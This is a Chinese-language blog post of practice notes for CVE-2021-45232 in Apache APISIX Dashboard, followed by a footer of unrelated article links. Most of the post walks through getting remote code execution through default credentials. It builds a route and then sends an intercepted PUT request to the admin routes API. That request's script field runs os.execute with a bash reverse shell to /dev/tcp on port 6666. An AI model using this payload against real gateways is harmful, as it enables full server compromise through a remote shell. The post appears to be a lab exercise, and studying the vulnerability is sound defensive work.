当前位置: 首页 > news >正文

CVE-2021-45232未授权接口练习笔记

CVE-2021-45232 是 Apache APISIX Dashboard 中的一个严重权限漏洞,类似于攻击者无需密码即可拿到整个网关系统的“万能钥匙”。攻击者利用此漏洞,可直接操控网关流量转发规则,甚至远程执行代码,引发服务器沦陷。

默认账户密码导致RCE

1.进入页面

2.先创建任意名称的上游服务

3.点击路由,添加新路由,选择上面创建的上游

4.点击创建的路由,查看修改配置添加反弹shell

5.抓包修改

PUT /apisix/admin/routes/559321412762862275 HTTP/1.1
Host: xx.xx.xx.xx:9003
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx:9003/routes/list
Content-Type: application/json;charset=UTF-8
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3NDI5MTMzMTQsImlhdCI6MTc0MjkwOTcxNCwic3ViIjoiYWRtaW4ifQ.SrI6Edp4UVkvUCKN5k_3STwzQ1zK100rHh8g67kTaZs
Content-Length: 235
Origin: http://xx.xx.xx.xx:9003
Connection: close


{"uri":"/*","name":"rce","methods":["GET","POST","PUT","DELETE","PATCH","HEAD","OPTIONS","CONNECT","TRACE",],"script":"os.execute('/bin/bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1')","upstream_id":"559320696761615043","status":1}

发送后在页面拼接/rec即可

相关文章:

  • conda环境下解决gitk乱码模糊
  • Postman使用02、断点、fiddler弱网测试
  • Java 基于微信小程序的开放实验室预约管理系统
  • 从单机到集群:Elasticsearch集群搭建指南
  • HTML5 初探:新特性与本地存储的魔法
  • IP-guard与Ping32哪个加密更强?两款加密软件的安全架构解析
  • 专访中兴通讯蒋军:AI数字人驱动企业培训,“内容生产”与“用户体验”双重提升
  • 第十节 MATLAB逻辑运算
  • 深入 SVG:矢量图形、滤镜与动态交互开发指南
  • 【微服务】SpringCloudGateway网关
  • 【开源宝藏】30天学会CSS - DAY8 第八课 跳动的爱心动画
  • 嵌入式八股文学习——基类构造与析构、成员初始化及继承特性详解
  • RAG核心概念
  • 蓝桥杯备考:差分数组+贪心Tallest Cow S
  • uv:Rust 驱动的 Python 包管理新时代
  • 里氏替换原则
  • SQL-查询漏洞
  • 通过国内源在Ubuntu20.0.4安装repo
  • 【时时三省】(C语言基础)用if语句实现选择结构
  • 多层感知机实现
  • php网站的adobe flash动图怎么改/搜索排名竞价
  • 华春建设工程项目管理有限公司网站/自媒体平台收益排行榜
  • 做英文网站建设/百度榜
  • 携程网站建设的意义/百度搜索大数据怎么查
  • qq空间做单页网站/网站制作大概多少钱
  • 小企业网站建设多少钱/青岛网站制作